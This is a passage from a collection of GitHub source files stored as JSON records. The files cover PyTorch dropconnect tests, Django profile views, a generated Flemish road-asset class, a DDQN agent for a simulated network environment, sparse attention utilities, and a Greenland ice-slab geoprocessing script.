DummyModel(torch.nn.Module):\n def __init__(self):\n super(DummyModel, self).__init__()\n self.conv = torch.nn.Conv2d(3, 8, kernel_size=10)\n self.relu = torch.nn.ReLU()\n self.dropout = torch.nn.Dropout()\n self.linear = torch.nn.Linear(8, 1)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.relu(x)\n x = x.view(x.shape[0], -1)\n x = self.dropout(x)\n x = self.linear(x)\n return x\n\n\n@pytest.mark.parametrize(\"inplace\", (True, False))\n@pytest.mark.parametrize(\"layers\", (['Linear'], ['Linear', 'Conv2d']))\ndef test_patch_module_changes_weights(inplace, layers):\n\n test_module = torch.nn.Sequential(\n torch.nn.Conv2d(3, 8, kernel_size=10),\n torch.nn.ReLU(),\n torch.nn.Dropout(p=0.5),\n torch.nn.Linear(8, 1),\n )\n\n conv_w = list(test_module.modules())[1].weight.clone().detach().numpy()\n linear_w = list(test_module.modules())[-1].weight.clone().detach().numpy()\n\n mc_test_module = patch_module(test_module, layers=layers, weight_dropout=0.2, inplace=inplace)\n\n # objects should be the same if inplace is True and not otherwise:\n assert (mc_test_module is test_module) == inplace\n\n new_linear_w = list(mc_test_module.modules())[-1].weight_raw.clone().detach().numpy()\n if layers == ['Linear']:\n assert isinstance(list(mc_test_module.modules())[-1], WeightDropLinear)\n assert isinstance(list(mc_test_module.modules())[1], torch.nn.Conv2d)\n new_conv_w = list(mc_test_module.modules())[1].weight.clone().detach().numpy()\n assert np.allclose(new_conv_w, conv_w)\n assert not np.allclose(new_linear_w, linear_w)\n else:\n assert isinstance(list(mc_test_module.modules())[-1], WeightDropLinear)\n assert isinstance(list(mc_test_module.modules())[1], WeightDropConv2d)\n new_conv_w = list(mc_test_module.modules())[1].weight_raw.clone().detach().numpy()\n assert not np.allclose(new_conv_w, conv_w)\n assert not np.allclose(new_linear_w, linear_w)\n\n assert list(mc_test_module.modules())[3].p == 0\n\n\ndef test_weight_change_after_forward_pass():\n test_module = DummyModel()\n dataset = DummyDataset()\n mc_test_module = MCDropoutConnectModule(test_module, layers=['Linear'], weight_dropout=0.2)\n\n assert not hasattr(list(test_module.modules())[-1], 'weight')\n linear_w = list(test_module.modules())[-1].weight_raw.clone().detach().numpy()\n\n input, _ = [torch.stack(v) for v in zip(*(dataset[0], dataset[1]))]\n mc_test_module.eval()\n out = mc_test_module(input)\n\n assert hasattr(list(test_module.modules())[-1], 'weight')\n new_linear_w = list(mc_test_module.modules())[-1].weight.clone().detach().numpy()\n assert not np.allclose(new_linear_w, linear_w)\n\n\nif __name__ == '__main__':\n pytest.main()\n","repo_name":"chunmk/baal","sub_path":"tests/bayesian/dropconnect_test.py","file_name":"dropconnect_test.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"30668391693","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom .forms import *\nfrom .models import Image, Search\nfrom django.contrib.auth.models import User\nfrom .forms import UserUpdateForm, UpdateProfileForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\n\n# Create your views here.\n\ndef profile_page(request):\n\n if request.method == 'POST':\n user_form = UserUpdateForm(request.POST, instance=request.user)\n profile_form = UpdateProfileForm(request.POST,\n request.FILES,\n instance=request.user.image)\n if user_form.is_valid() 
and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, 'Your account has been updated')\n return redirect('profile')\n else:\n if not request.user.is_authenticated:\n messages.warning(request, 'You need to be logged in to view that!')\n return redirect('login')\n user_form = UserUpdateForm(instance=request.user)\n profile_form = UpdateProfileForm(instance=request.user.image)\n\n\n context = {\n 'user_form': user_form,\n 'profile_form': profile_form\n }\n return render(request, 'home/profile_page.html', context)\n\n\ndef success(request):\n return HttpResponse('successfully uploaded')\n\ndef search_history(request):\n user = User.objects.get(username=request.user)\n if user.is_authenticated:\n history = list(Search.objects.filter(user=user).order_by('-timestamp').values('keyword', 'id'))\n print(history)\n return JsonResponse(history, safe=False)\n else:\n return JsonResponse([], safe=False)\n\n","repo_name":"RagnarSmari/redstarcereal-dev","sub_path":"user_profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"71760425642","text":"# coding=utf-8\nfrom OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut\nfrom OTLMOW.OTLModel.Classes.Abstracten.Proef import Proef\nfrom OTLMOW.OTLModel.Datatypes.DtcDocument import DtcDocument\nfrom OTLMOW.GeometrieArtefact.PuntGeometrie import PuntGeometrie\nfrom OTLMOW.GeometrieArtefact.LijnGeometrie import LijnGeometrie\nfrom OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie\n\n\n# Generated with OTLClassCreator. To modify: extend, do not edit\nclass ProefLuchtdichtheid(Proef, PuntGeometrie, LijnGeometrie, VlakGeometrie):\n \"\"\"Testen van de drukval van het beproefde leidingsvak.\"\"\"\n\n typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/proefenmeting#ProefLuchtdichtheid'\n \"\"\"De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI.\"\"\"\n\n def __init__(self):\n Proef.__init__(self)\n LijnGeometrie.__init__(self)\n PuntGeometrie.__init__(self)\n VlakGeometrie.__init__(self)\n\n self.add_valid_relation(relation='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#IsInspectieVan', target='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Buis')\n self.add_valid_relation(relation='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#IsInspectieVan', target='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Put')\n\n self._luchtdichtheid = OTLAttribuut(field=DtcDocument,\n naam='luchtdichtheid',\n label='luchtdichtheid',\n objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/proefenmeting#ProefLuchtdichtheid.luchtdichtheid',\n definition='Testresultaten van de opgemeten drukval van het beproefde leidingsvak.',\n owner=self)\n\n @property\n def luchtdichtheid(self):\n \"\"\"Testresultaten van de opgemeten drukval van het beproefde leidingsvak.\"\"\"\n return self._luchtdichtheid.get_waarde()\n\n @luchtdichtheid.setter\n def luchtdichtheid(self, value):\n self._luchtdichtheid.set_waarde(value, owner=self)\n","repo_name":"davidvlaminck/OTLMOW","sub_path":"src/OTLMOW/OTLModel/Classes/ProefEnMeting/ProefLuchtdichtheid.py","file_name":"ProefLuchtdichtheid.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"nl","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
{"seq_id":"45062517299","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import deque\nimport random, datetime, os, copy\nimport network_parser\n\nclass Net(nn.Module):\n def __init__(self, input_dim, output_dim, layer_size=24):\n super().__init__()\n self.online = nn.Sequential(\n nn.Linear(input_dim, layer_size),\n nn.ReLU(),\n nn.Linear(layer_size, layer_size),\n nn.ReLU(),\n nn.Linear(layer_size, output_dim),\n )\n self.target = copy.deepcopy(self.online)\n for p in self.target.parameters():\n p.requires_grad = False\n\n def forward(self, input, model):\n if model == 'online':\n return self.online(input)\n elif model == 'target':\n return self.target(input)\n\nclass DDQN(object):\n def __init__(self, network, plot_dir, save_dir):\n self.network = network\n self.state_dim = self.network.state_dim\n self.action_dim = self.network.action_dim\n self.plot_dir = plot_dir\n self.save_dir = save_dir\n\n self.memory = deque(maxlen=100_000)\n self.batch_size = 32\n self.gamma = 0.5\n\n self.net = Net(self.state_dim, self.action_dim)\n self.optimizer = optim.Adam(self.net.parameters(), lr=5e-3)\n self.loss = nn.MSELoss()\n\n self.epsilon = 1\n self.epsilon_decay = 0.9999\n self.epsilon_min = 0.001\n self.cur_step = 0\n\n self.burnin = 1e4\n self.learn_step = 3\n self.sync_step = 1e4\n self.indicator = False\n self.score_history = list()\n self.avg_score_history = list()\n\n def act(self, state):\n if np.random.rand() < self.epsilon:\n action = np.random.randint(self.action_dim)\n else:\n state = torch.tensor(state)\n state = state.unsqueeze(0)\n action_values = self.net(state, model='online')\n action = torch.argmax(action_values, axis=1).item()\n\n self.epsilon *= self.epsilon_decay\n self.epsilon = max(self.epsilon, self.epsilon_min)\n self.cur_step += 1\n return action\n\n def cache(self, state, action, reward, next_state, done):\n state = torch.tensor(state)\n next_state = torch.tensor(next_state)\n action = torch.tensor([action])\n reward = torch.tensor([reward])\n done = torch.tensor([done])\n self.memory.append((state, action, reward, next_state, done))\n\n def recall(self):\n batch = random.sample(self.memory, self.batch_size)\n state, action, reward, next_state, done = map(torch.stack, zip(*batch))\n return state, action.squeeze(), reward.squeeze(), next_state, done.squeeze()\n\n def td_estimate(self, state, action):\n current_Q = self.net(state, model='online')[np.arange(self.batch_size), action]\n return current_Q\n\n @torch.no_grad()\n def td_target(self, reward, next_state, done):\n next_state_Q = self.net(next_state, model='online')\n best_action = torch.argmax(next_state_Q, axis=1)\n next_Q = self.net(next_state, model='target')[np.arange(self.batch_size), best_action]\n return (reward + (1 - done.float()) * self.gamma * next_Q).float()\n\n def update_online(self, td_estimate, td_target):\n loss = self.loss(td_estimate, td_target)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n return loss\n\n def sync_target(self):\n self.net.target.load_state_dict(self.net.online.state_dict())\n\n def learn(self):\n if self.cur_step < self.burnin:\n return None, None\n\n if self.cur_step % self.learn_step != 0:\n return None, None\n\n if self.indicator == False:\n print(\"Start training\")\n self.indicator = True\n\n if self.cur_step % self.sync_step == 0:\n self.sync_target()\n\n state, action, reward, next_state, done = self.recall()\n td_estimate = self.td_estimate(state, action)\n td_target = self.td_target(reward, next_state, done)\n loss = self.update_online(td_estimate, td_target)\n return td_estimate.mean().item(), loss.item()\n\n def run(self, num_episodes, threshold, interval=10):\n count = 0\n print('state_dim:', self.network.state_dim, 'action_dim: ', self.network.action_dim)\n self.score_history = list()\n self.avg_score_history = list()\n for i in range(num_episodes):\n done = False\n score = 0\n state = self.network.reset()\n\n while not done:\n action = self.act(state)\n next_state, reward, done, info = self.network.step(action)\n self.cache(state, action, reward, next_state, done)\n q, loss = self.learn()\n state = next_state\n score += reward\n\n self.score_history.append(score)\n avg_score = np.mean(self.score_history[-100:])\n self.avg_score_history.append(avg_score)\n if i % interval == 0:\n print('episode ', i, 'epsilon ', self.epsilon, 'score %.2f average score %.2f' % (score, avg_score))\n count = count + 1 if avg_score >= threshold else 0\n if count > 100 and score >= threshold:\n self.save(score)\n break\n\n def plot(self, info='', save=True):\n plt.plot(self.avg_score_history)\n if save:\n plt.savefig(os.path.join(self.plot_dir, self.network.name+'-ddqn'+info+'.png'))\n plt.close()\n else:\n plt.show()\n\n def save(self, info):\n torch.save(self.net.state_dict(), os.path.join(self.save_dir, self.network.name+'-ddqn-'+str(info)+'.pt'))\n\ndef test(test_network):\n network = network_parser.parse(test_network)\n net = Net(network.state_dim, network.action_dim)\n net.load_state_dict(torch.load(os.path.join('saved_model', 'subnet-10-machine-30-service-6-v0-ddqn-277.pt')))\n net.eval()\n\n print('state_dim:', network.state_dim, 'action_dim: ', network.action_dim)\n num_episodes = 50\n interval = 5\n score_history = list()\n for i in range(num_episodes):\n done = False\n score = 0\n state = network.reset()\n \n while not done:\n state = torch.tensor(state)\n state = state.unsqueeze(0)\n action_values = net(state, model='online')\n action = torch.argmax(action_values, axis=1).item()\n\n # print(action)\n next_state, reward, done, info = network.step(action)\n state = next_state\n score += reward\n\n score_history.append(score)\n avg_score = np.mean(score_history[-100:])\n if i % interval == 0:\n print('episode ', i, 'score %.2f average score %.2f' % (score, avg_score))\n\nif __name__ == '__main__':\n network = network_parser.parse('subnet-10-machine-30-service-6-v0.json')\n agent = DDQN(network, './plots', './saved_model')\n agent.run(2000, 0)\n agent.plot()\n # test('subnet-10-machine-30-service-6-v0.json')","repo_name":"ChangFu2000/Thesis","sub_path":"static/ddqn.py","file_name":"ddqn.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"28494137486","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\n# MULTI HEAD SPARSE BLOCK ATTENTION UTILS\n\n\ndef torch_bmm_nd(inp_1, inp_2, ndim=None):\n \"\"\" Fast nd matrix multiplication \"\"\"\n return torch.bmm(\n inp_1.reshape((-1,) + inp_1.shape[-2:]), inp_2.reshape((-1,) + inp_2.shape[-2:])\n ).view(inp_1.shape[: ndim - 2] + (inp_1.shape[ndim - 2], inp_2.shape[ndim - 1]))\n\n\ndef torch_bmm_nd_transpose(inp_1, inp_2, ndim=None):\n \"\"\" Fast nd matrix multiplication with transpose \"\"\"\n return torch.bmm(\n inp_1.reshape((-1,) + inp_1.shape[-2:]),\n inp_2.reshape((-1,) + inp_2.shape[-2:]).transpose(1, 2),\n ).view(inp_1.shape[: ndim - 2] + 
(inp_1.shape[ndim - 2], inp_2.shape[ndim - 2]))\n\n\ndef get_random_mask_with_heads(\n sequence_length: int,\n num_heads: int,\n blocked_mask,\n indexes,\n block_size: int,\n nr: int,\n batch_size: int,\n):\n bm = (\n blocked_mask.unsqueeze(-1)\n .unsqueeze(-1)\n .unsqueeze(1)\n .expand(-1, num_heads, -1, -1, 1, nr)\n .transpose(-1, -3)\n .view(batch_size, num_heads, sequence_length // block_size, nr, block_size)\n )\n\n random_mask = (\n indexes.unsqueeze(0)\n .unsqueeze(-1)\n .expand(batch_size, num_heads, -1, -1, block_size)\n )\n # print(random_mask.shape, bm.shape)\n random_mask = torch.gather(bm, 2, random_mask)\n return torch.einsum(\n \"blq,bhlk->bhlqk\",\n blocked_mask[:, 1:-1],\n random_mask.view(\n batch_size, num_heads, sequence_length // block_size - 2, block_size * nr\n ),\n )\n\ndef blockify_with_heads(\n x, batch_size: int, num_heads: int, sequence_length: int, block_size: int\n):\n \"\"\"\n block_length: sequence_length // block_size\n \"\"\"\n return x.reshape(\n batch_size, num_heads, sequence_length // block_size, block_size, -1\n )\n\ndef get_random_attention_indexes_with_heads(\n sequence_length: int,\n num_heads: int,\n block_size: int,\n num_random: int,\n num_neighbours: int = 3,\n margin: int = 1,\n):\n \"\"\"\n Selects random IDs for each row\n Output: Tensor, with IDs\n \"\"\"\n assert num_neighbours == 3, \"Not Implemented\"\n bl = sequence_length // block_size\n di = np.diag_indices(bl, ndim=1)\n\n illegal_indices = np.concatenate(\n [\n np.zeros([1, bl]),\n di,\n np.roll(di, shift=-1),\n np.roll(di, shift=1),\n np.full([1, bl], bl - 1),\n ]\n ).transpose(-1, -2)\n\n def h(x, rn):\n return np.random.choice(\n [i for i in range(0, sequence_length // block_size) if i not in x],\n rn,\n replace=False,\n )\n\n res = []\n for _ in range(num_heads):\n res.append(\n np.apply_along_axis(h, 1, illegal_indices, rn=num_random)[margin:-margin]\n )\n\n return torch.LongTensor(np.stack(res, 0))\n\n\ndef get_gathered_indexes_with_heads(\n indexes,\n num_heads: int,\n batch_size: int,\n sequence_length: int,\n block_size: int,\n rn: int,\n hidden_size: int,\n):\n \"\"\"\n Map for random blocks\n Args:\n indexes: Tensor, with block_ids\n \"\"\"\n assert indexes.shape[0] == num_heads, \"Wrong number of heads\"\n head_indexes = []\n for h in range(num_heads):\n head_indexes.append(\n get_gathered_indexes(\n indexes[h],\n batch_size=batch_size,\n sequence_length=sequence_length,\n block_size=block_size,\n hidden_size=hidden_size // num_heads,\n rn=rn,\n )\n )\n\n return torch.stack(head_indexes, 1)\n\n\n# SINGLE HEAD SPARSE BLOCK ATTENTION UTILS\n\n\ndef get_random_attention_indexes(\n sequence_length: int,\n block_size: int,\n num_random: int,\n num_neighbours: int = 3,\n margin: int = 1,\n):\n \"\"\"\n Selects random IDs for each row\n Output: Tensor, with IDs\n \"\"\"\n assert num_random < 3 and num_random >= 1, \"Not Implemented\"\n assert num_neighbours == 3, \"Not Implemented\"\n assert (\n sequence_length // block_size - 1 - num_neighbours > num_random\n ), \"Number of random blocks is too large\"\n\n bl = sequence_length // block_size\n di = np.diag_indices(bl, ndim=1)\n illegal_indices = np.concatenate(\n [\n np.zeros([1, bl]),\n di,\n np.roll(di, shift=-1),\n np.roll(di, shift=1),\n np.full([1, bl], bl - 1),\n ]\n ).transpose(-1, -2)\n\n def h(x, rn):\n return np.random.choice(\n [i for i in range(0, sequence_length // block_size) if i not in x],\n rn,\n replace=False,\n )\n\n # , illegal_indices[margin:-margin]\n return torch.LongTensor(\n np.apply_along_axis(h, 1, 
illegal_indices, rn=num_random)[margin:-margin]\n )\n\n\n@torch.jit.script\ndef get_gathered_indexes(\n indexes,\n batch_size: int,\n sequence_length: int,\n block_size: int,\n rn: int,\n hidden_size: int,\n):\n \"\"\"\n Map for random blocks\n Args:\n indexes: Tensor, with block_ids\n \"\"\"\n return (\n indexes.unsqueeze(0)\n .unsqueeze(-1)\n .expand(batch_size, -1, rn, block_size)\n .reshape(batch_size, -1, block_size * rn)\n .unsqueeze(-1)\n .expand(-1, -1, -1, hidden_size)\n .reshape(batch_size, -1, block_size, hidden_size)\n )\n\n\n@torch.jit.script\ndef get_random_mask(\n sequence_length: int,\n blocked_mask,\n indexes,\n block_size: int,\n nr: int,\n batch_size: int,\n):\n bm = (\n blocked_mask.unsqueeze(-1)\n .unsqueeze(-1)\n .expand(-1, -1, -1, 1, nr)\n .transpose(-1, -3)\n .view(batch_size, sequence_length // block_size, nr, block_size)\n )\n random_mask = (\n indexes.unsqueeze(0).unsqueeze(-1).expand(batch_size, -1, -1, block_size)\n )\n random_mask = torch.gather(bm, 1, random_mask)\n return torch.einsum(\n \"blq,blk->blqk\",\n blocked_mask[:, 1:-1],\n random_mask.view(\n batch_size, sequence_length // block_size - 2, block_size * nr\n ),\n )\n\n\n@torch.jit.script\ndef get_padding_mask(x, padding_token: int = 0):\n return (x == padding_token).long()\n\n\n@torch.jit.script\ndef get_padding2attention_mask(padding_mask):\n mask = torch.einsum(\"bf,bt->bft\", padding_mask, padding_mask)\n # Create 2D attention mask\n return torch.unsqueeze(mask, 1)\n\n\n@torch.jit.script\ndef get_band_mask(blocked_mask):\n \"\"\"Create 3D attention mask from a 2D tensor mask.\n Args:\n blocked_mask: 2D Tensor of shape [batch_size, from_seq_length//from_block_size, from_block_size].\n Returns:\n float Tensor of shape [batch_size, 1, from_seq_length//from_block_size-4,\n block_size, 3*to_block_size].\n \"\"\"\n\n exp_blocked_to_pad = torch.cat(\n [blocked_mask[:, 1:-3], blocked_mask[:, 2:-2], blocked_mask[:, 3:-1]], 2\n )\n band_mask = torch.einsum(\n \"blq,blk->blqk\", blocked_mask[:, 2:-2], exp_blocked_to_pad\n ).unsqueeze(1)\n return band_mask\n\n\n@torch.jit.script\ndef blockify(x, batch_size: int, block_length: int, block_size: int):\n \"\"\"\n block_length: sequence_length // block_size\n \"\"\"\n return x.reshape(batch_size, block_length, block_size, -1)\n\n\ndef simulate_sparse_mask(sequence_length, block_size, rand_attn):\n r = np.kron(\n np.diag(np.ones(sequence_length // block_size)),\n np.ones((block_size, block_size), dtype=\"int\"),\n )\n r = torch.LongTensor(r)\n r = torch.max(r, torch.roll(r, block_size, 1))\n r = torch.max(r, torch.roll(r, -block_size, 1))\n r[:, :block_size] = 1\n r[:, -block_size:] = 1\n r[:block_size, :] = 1\n r[-block_size:, :] = 1\n ind = torch.LongTensor(range(1, sequence_length // block_size - 1))\n r = (\n torch.LongTensor(r)\n .view(\n sequence_length // block_size,\n block_size,\n sequence_length // block_size,\n block_size,\n )\n .permute(0, 2, 1, -1)\n .transpose(-1, -2)\n )\n for i in range(rand_attn.shape[1]):\n r[ind, rand_attn[:, i]] = 1\n\n return (\n r.transpose(-1, -2).permute(0, 2, 1, 3).view(sequence_length, sequence_length)\n )\n","repo_name":"SocialComplexityLab/life2vec","sub_path":"src/transformer/att_utils.py","file_name":"att_utils.py","file_ext":"py","file_size_in_byte":8309,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"73085344682","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 2 16:33:27 2022\n@author: jullienn\n\"\"\"\n#Import packages\nimport geopandas as 
gpd # Requires the pyshp package\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom shapely.geometry import Point, Polygon\nfrom pyproj import Transformer\nimport pdb\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\n\n### -------------------------- Load GrIS DEM ----------------------------- ###\n#https://towardsdatascience.com/reading-and-visualizing-geotiff-images-with-python-8dcca7a74510\nimport rasterio\nfrom rasterio.plot import show\n\n#Choose high end or low end\ndataset_type='high'\nprint('Processing dataset:',dataset_type)\n#Define path\npath='C:/Users/jullienn/switchdrive/Private/research/RT1/final_dataset_2002_2018/'\n\npath_GrIS_DEM = r'C:/Users/jullienn/switchdrive/Private/research/backup_Aglaja/working_environment/greenland_topo_data/elevations/greenland_dem_mosaic_100m_v3.0.tif'\nGrIS_DEM = rasterio.open(path_GrIS_DEM)\n### -------------------------- Load GrIS DEM ----------------------------- ###\n\n### -------------------------- Load shapefiles --------------------------- ###\n#from https://gis.stackexchange.com/questions/113799/how-to-read-a-shapefile-in-python\n#Load Rignot et al., 2016 Greenland drainage bassins\npath_rignotetal2016_GrIS_drainage_bassins='C:/Users/jullienn/switchdrive/Private/research/backup_Aglaja/working_environment/greenland_topo_data/GRE_Basins_IMBIE2_v1.3/'\nGrIS_drainage_bassins=gpd.read_file(path_rignotetal2016_GrIS_drainage_bassins+'GRE_Basins_IMBIE2_v1.3_EPSG_3413.shp',rows=slice(51,57,1)) #the regions are the last rows of the shapefile\n#Extract indiv regions and create related indiv shapefiles\nNO_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='NO']\nNE_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='NE']\nSE_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='SE']\nSW_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='SW']\nCW_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='CW']\nNW_rignotetal=GrIS_drainage_bassins[GrIS_drainage_bassins.SUBREGION1=='NW']\n\n#Load Rignot et al., 2016 GrIS mask\npath_rignotetal2016_GrIS='C:/Users/jullienn/switchdrive/Private/research/backup_Aglaja/working_environment/greenland_topo_data/GRE_IceSheet_IMBIE2/GRE_IceSheet_IMBIE2/'\nGrIS_rignotetal2016=gpd.read_file(path_rignotetal2016_GrIS+'GRE_IceSheet_IMBIE2_v1_EPSG3413.shp',rows=slice(1,2,1)) #the regions are the last rows of the shapefile\nGrIS_mask=GrIS_rignotetal2016[GrIS_rignotetal2016.SUBREGION1=='ICE_SHEET']\n### -------------------------- Load shapefiles --------------------------- ###\n\n### ---------------- Load 2002-2003 ice lenses location ------------------ ###\npath_data='C:/Users/jullienn/Documents/working_environment/iceslabs_MacFerrin/icelens_identification'\n \n#Open the file and read it\nf_icelens_flightlines = open(path_data+'/metadata_coord_icelens_2002_2003_26022020', \"rb\")\nicelens_2002_3_flightlines = pickle.load(f_icelens_flightlines)\nf_icelens_flightlines.close()\n\nlat_icelens=[]\nlon_icelens=[]\ncolorcode_icelens=[]\nTrack_name=[]\n\nfor year in list(icelens_2002_3_flightlines.keys()):\n for days in list(icelens_2002_3_flightlines[year].keys()):\n for indiv_file in list(icelens_2002_3_flightlines[year][days].keys()):\n print(indiv_file)\n if (indiv_file[0:7]=='quality'):\n print('Quality file, continue')\n continue\n elif (not(bool(icelens_2002_3_flightlines[year][days][indiv_file]))):\n print('No ice lens, continue')\n continue\n else:\n 
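#accumulate lat/lon coordinates, colour codes and track names for this file\n 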
lat_icelens=np.append(lat_icelens,icelens_2002_3_flightlines[year][days][indiv_file][0])\n lon_icelens=np.append(lon_icelens,icelens_2002_3_flightlines[year][days][indiv_file][1])\n colorcode_icelens=np.append(colorcode_icelens,icelens_2002_3_flightlines[year][days][indiv_file][2])\n #Create an empty vector of strings\n Track_name=np.append(Track_name,[indiv_file for x in range(0,len(icelens_2002_3_flightlines[year][days][indiv_file][0]))])\n\n#Create a dataframe out of it\ndf_2002_2003=pd.DataFrame(lat_icelens, columns =['lat_3413'])\ndf_2002_2003['lon_3413']=lon_icelens\ndf_2002_2003['colorcode_icelens']=colorcode_icelens\ndf_2002_2003['Track_name']=Track_name\n### ---------------- Load 2002-2003 ice lenses location ------------------ ###\n\n### --------------------- Load 2010-2018 ice slabs ----------------------- ###\ncsv_name=dataset_type+'_estimate'\n#Load the data\n#filename_20102018=path+'final_excel/dataset_for_Fig3/Ice_Layer_Output_Thicknesses_2010_2018_jullienetal2021_Fig3_'+csv_name+'.csv'#For Fig3\nfilename_20102018=path+'final_excel/'+csv_name+'/Ice_Layer_Output_Thicknesses_2010_2018_jullienetal2021_'+csv_name+'.csv'\ndf_20102018 = pd.read_csv(filename_20102018, sep=\",\", decimal='.')\n'''\n#Load the data !for RT3!\nfilename_20102018='C:/Users/jullienn/switchdrive/Private/research/RT3/export_RT1_for_RT3/Ice_Layer_Output_Thicknesses_Likelihood_2010_2018_jullienetal2021_for_RT3_masked.csv'\ndf_20102018 = pd.read_csv(filename_20102018, sep=\",\", decimal='.')\n'''\n#Transform the coordinated from WGS84 to EPSG:3413\n#Example from: https://pyproj4.github.io/pyproj/stable/examples.html\ntransformer = Transformer.from_crs(\"EPSG:4326\", \"EPSG:3413\", always_xy=True)\npoints=transformer.transform(np.array(df_20102018.lon),np.array(df_20102018.lat))\n\n#Store lat/lon 3413\ndf_20102018['lat_3413']=points[1]\ndf_20102018['lon_3413']=points[0]\n### --------------------- Load 2010-2018 ice slabs ----------------------- ###\n\n### --------------------- Load 2010-2018 shapefile ----------------------- ###\n#Define path\nshapefile_name=dataset_type+'end'\npath_shapefile=path+'shapefiles/iceslabs_jullien_'+shapefile_name+'_20102018.shp'\ndf_20102018_shapefile = gpd.read_file(path_shapefile)\n### --------------------- Load 2010-2018 shapefile ----------------------- ###\n\n### --- Clip data with shapefile to get rid of too low elevations points --- ###\nprint('--- Clip 2010-2018 data to shapefile ---')\n#This is from Fig. 
1\ndf_20102018['coords'] = list(zip(df_20102018['lon_3413'],df_20102018['lat_3413']))\ndf_20102018['coords'] = df_20102018['coords'].apply(Point)\npoints = gpd.GeoDataFrame(df_20102018, geometry='coords', crs=\"EPSG:3413\")\ndf_20102018_clipped = gpd.tools.sjoin(points, df_20102018_shapefile, predicate=\"within\", how='left') #This is from https://www.matecdev.com/posts/point-in-polygon.html\n\n#Drop duplicates (some points might belong to two regions at borders)\ndf_20102018_clipped['indexes'] = df_20102018_clipped.index\ndf_20102018_clipped_dropped = df_20102018_clipped.drop_duplicates(subset='indexes',keep='first')\ndf_20102018_clipped_dropped = df_20102018_clipped_dropped[~pd.isna(df_20102018_clipped_dropped.region)]\n### --- Clip data with shapefile to get rid of too low elevations points --- ###\n\n### -------------------- Save 2010-2018 clipped data ---------------------- ###\n#filename_tosave=path+'final_excel/dataset_for_Fig3/clipped/Ice_Layer_Output_Thicknesses_2010_2018_jullienetal2021_Fig3_'+csv_name+'_cleaned.csv'#For Fig3\nfilename_tosave=path+'final_excel/'+csv_name+'/clipped/Ice_Layer_Output_Thicknesses_2010_2018_jullienetal2021_'+csv_name+'_cleaned.csv'\ndf_20102018_clipped_dropped.to_csv(filename_tosave,columns=['Track_name', 'Tracenumber', 'lat', 'lon', 'alongtrack_distance_m','20m_ice_content_m', 'likelihood'])\n### -------------------- Save 2010-2018 clipped data ---------------------- ###\nprint('--- Done clip 2010-2018 data to shapefile ---')\n\n#Drop useless columns\ndf_20102018_clipped_dropped=df_20102018_clipped_dropped.drop(columns=['coords','index_right','id','region','indexes'])\n\n#Initialise the elevation and shapefile belonging column\ndf_20102018_clipped_dropped['key_shp']=np.nan\ndf_20102018_clipped_dropped['elevation']=np.nan\ndf_20102018_clipped_dropped['year']=np.nan\n\n#Make sure what we did is correct\ncrs = ccrs.NorthPolarStereo(central_longitude=-45., true_scale_latitude=70.) \nfig = plt.figure()\nax1 = plt.subplot(projection=crs)\ndf_20102018_shapefile.plot(ax=ax1,color='#d73027', edgecolor='none',linewidth=0.5)\nax1.scatter(df_20102018['lon_3413'],df_20102018['lat_3413'],s=2,c='blue')\nax1.scatter(df_20102018_clipped_dropped['lon_3413'],df_20102018_clipped_dropped['lat_3413'],s=1,c='green')\nplt.close()\n\nprint('--- Extract elevation ---')\n### ----------- Extract elevation and region for 2010-2018 --------------- ###\n#This part of code is from 'refine_location_2017_2018.py'\n#Loop over all data point to check whether it belongs to one of the four shapefile\nfor i in df_20102018_clipped_dropped.index:\n #select the point i\n single_point=Point(df_20102018_clipped_dropped.loc[i,'lon_3413'],df_20102018_clipped_dropped.loc[i,'lat_3413'])\n \n #Do the identification between the point i and the regional shapefiles\n #From: https://automating-gis-processes.github.io/CSC18/lessons/L4/point-in-polygon.html\n check_NO_rignotetal=np.asarray(NO_rignotetal.contains(single_point)).astype(int)\n check_NE_rignotetal=np.asarray(NE_rignotetal.contains(single_point)).astype(int)\n check_SE_rignotetal=np.asarray(SE_rignotetal.contains(single_point)).astype(int)\n check_SW_rignotetal=np.asarray(SW_rignotetal.contains(single_point)).astype(int)\n check_CW_rignotetal=np.asarray(CW_rignotetal.contains(single_point)).astype(int)\n check_NW_rignotetal=np.asarray(NW_rignotetal.contains(single_point)).astype(int)\n\n 